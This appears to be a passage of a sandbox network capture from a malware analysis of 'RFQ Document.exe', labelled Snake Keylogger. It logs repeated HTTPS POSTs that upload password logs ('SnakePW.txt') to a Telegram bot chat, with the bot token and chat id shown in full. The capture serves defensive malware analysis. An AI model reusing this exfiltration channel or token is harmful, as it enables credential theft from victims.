                                            2021-09-28 05:58:38 UTC123OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 34 30 33 64 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cc403d3dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:38 UTC123INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:38 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:38 UTC124INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12660,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808718,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            78192.168.2.449854149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:38 UTC124OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cc65c603
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:38 UTC125OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 36 35 63 36 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cc65c603Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:38 UTC125INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:38 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:38 UTC125INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12661,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808718,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            79192.168.2.449855149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:38 UTC126OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cc7b3b50
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:38 UTC126OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 37 62 33 62 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cc7b3b50Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:38 UTC127INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:38 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:38 UTC127INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12662,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808718,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            8192.168.2.449782149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:22 UTC12OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c2ce142c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:22 UTC12OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 63 65 31 34 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c2ce142cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:22 UTC13INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:22 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:22 UTC13INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12587,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808702,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            80192.168.2.449856149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:38 UTC128OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cc9a3987
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:38 UTC128OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 39 61 33 39 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cc9a3987Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:38 UTC128INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:38 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:38 UTC129INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12663,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808718,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            81192.168.2.449857149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:38 UTC129OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ccb9372e
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:38 UTC129OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 62 39 33 37 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ccb9372eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:39 UTC130INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:39 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:39 UTC130INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12664,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808718,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            82192.168.2.449858149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:39 UTC131OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ccd10e90
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:39 UTC131OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 64 31 30 65 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ccd10e90Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:39 UTC131INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:39 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:39 UTC132INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12665,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808719,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            83192.168.2.449859149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:39 UTC132OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cce684f4
                                            Host: api.telegram.org
                                            Content-Length: 407
